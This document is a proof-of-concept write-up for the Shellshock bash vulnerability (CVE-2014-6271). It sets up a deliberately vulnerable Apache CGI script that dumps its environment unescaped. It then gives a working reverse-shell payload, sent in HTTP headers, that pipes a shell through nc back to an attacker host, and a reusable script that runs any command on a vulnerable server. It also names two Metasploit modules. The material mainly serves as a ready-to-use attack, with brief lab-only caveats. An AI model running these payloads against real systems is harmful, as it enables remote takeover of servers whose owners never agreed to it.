# CVE-2014-6271: Bash shellshock


Reverse shell PoC. Vulnerable bash versions import environment variables whose value starts with `() {` as function definitions and also execute whatever follows the closing brace; mod_cgi exports request headers such as User-Agent and Referer into the CGI process environment (HTTP_USER_AGENT, HTTP_REFERER), so a crafted header is executed by any bash CGI script on the server.

- Vulnerable server (192.168.1.2: Apache with mod_cgi enabled and a bash CGI script that dumps its environment; keep this on an isolated lab network)

# a2enmod cgi
# sed -i 's/#Include conf-available\/serve-cgi-bin.conf/Include conf-available\/serve-cgi-bin.conf/' /etc/apache2/sites-available/000-default.conf
# service apache2 restart
# cat /usr/lib/cgi-bin/env.sh
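#!/bin/bash
#
# env.sh: deliberately vulnerable CGI test target for CVE-2014-6271.
# Dumps the CGI process environment as an HTML page. Because mod_cgi exports
# request headers into that environment (HTTP_USER_AGENT, HTTP_REFERER, ...),
# the page shows exactly which variables a Shellshock payload reaches.
# Lab use only: it exposes the whole server environment to any client, and the
# header values are reflected into the HTML without escaping.

# Write the response to stdout, which mod_cgi returns to the client.
# The empty line after the Content-type header terminates the HTTP headers.
render_page() {
        printf 'Content-type: text/html\n'
        printf '\n'

        printf '<html>\n'
        printf '<head>\n'
        printf '<title>cve-2014-6271</title>\n'
        printf '</head>\n'
        printf '<body>\n'
        printf '<pre>\n'

        # Environment dump, not HTML-escaped (intentional for this lab target).
        /usr/bin/env

        printf '</pre>\n'
        printf '</body>\n'
        printf '</html>\n'   # closing tag was misspelled '</hmtl>'
}

render_page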

- Client (attacker host 192.168.1.1; start the nc listener in one terminal, then send the payload from another — the listener blocks until the target connects back)

# ip="192.168.1.1"
# nc -v --listen $ip --port=1234
# ip="192.168.1.1"
# payload="() { :; }; /bin/bash -c 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc $ip 1234 > /tmp/f'"
# url="http://192.168.1.2/cgi-bin/env.sh"
# curl --verbose --user-agent "$payload" --referer "$payload" $url
nc: connect to 192.168.1.1 1234 from 192.168.1.2
$

Scripts

# cat cve-2014-6271-cmd
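#!/bin/bash
#
# cve-2014-6271-cmd: run one command on a host whose CGI handler hands request
# headers to a vulnerable bash (CVE-2014-6271, "Shellshock").
#
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
#
# Usage: cve-2014-6271-cmd PROTO HOST PORT PATH CMD
#   PROTO  http or https
#   HOST   target host
#   PORT   target port
#   PATH   CGI path relative to the document root, e.g. cgi-bin/env.sh
#   CMD    command to run on the target; its stdout and stderr come back in
#          the HTTP response body
#
# The payload is sent in both the User-Agent and Referer headers, which
# mod_cgi exports to the CGI process as HTTP_USER_AGENT / HTTP_REFERER.
# Use only against systems you are authorised to test.

set -u

if [ "$#" -ne 5 ]; then
        echo "usage: ${0##*/} http|https host port path cmd" >&2
        exit 2
fi

proto="$1"
host="$2"
port="$3"
path="$4"
cmd="$5"

# curl options are collected in an array so that an absent option expands to
# nothing rather than to an empty word.
curl_args=(--verbose)

if [ "$proto" == "https" ]; then
        # Lab targets usually present self-signed certificates. --insecure
        # disables certificate verification, so anyone on the path can read or
        # alter the command and its output; drop it against real targets.
        curl_args+=(--insecure)
fi

url="$proto://$host:$port/$path"

# '() { :; };' is the function definition a vulnerable bash parses from the
# imported variable; everything after it is executed. The doubled backslashes
# reach the target as: echo -e '\r\n'  -- an empty line that terminates the
# HTTP headers, so the output of $cmd lands in the response body instead of
# being discarded as a malformed header.
payload="() { :; }; echo -e '\\r\\n'; $cmd 2>&1"

curl "${curl_args[@]}" --user-agent "$payload" --referer "$payload" "$url"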

# ./cve-2014-6271-cmd http 127.0.0.1 1580 cgi-bin/env.sh '/bin/uname -a'

Metasploit modules

msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf > use exploits/multi/http/apache_mod_cgi_bash_env_exec
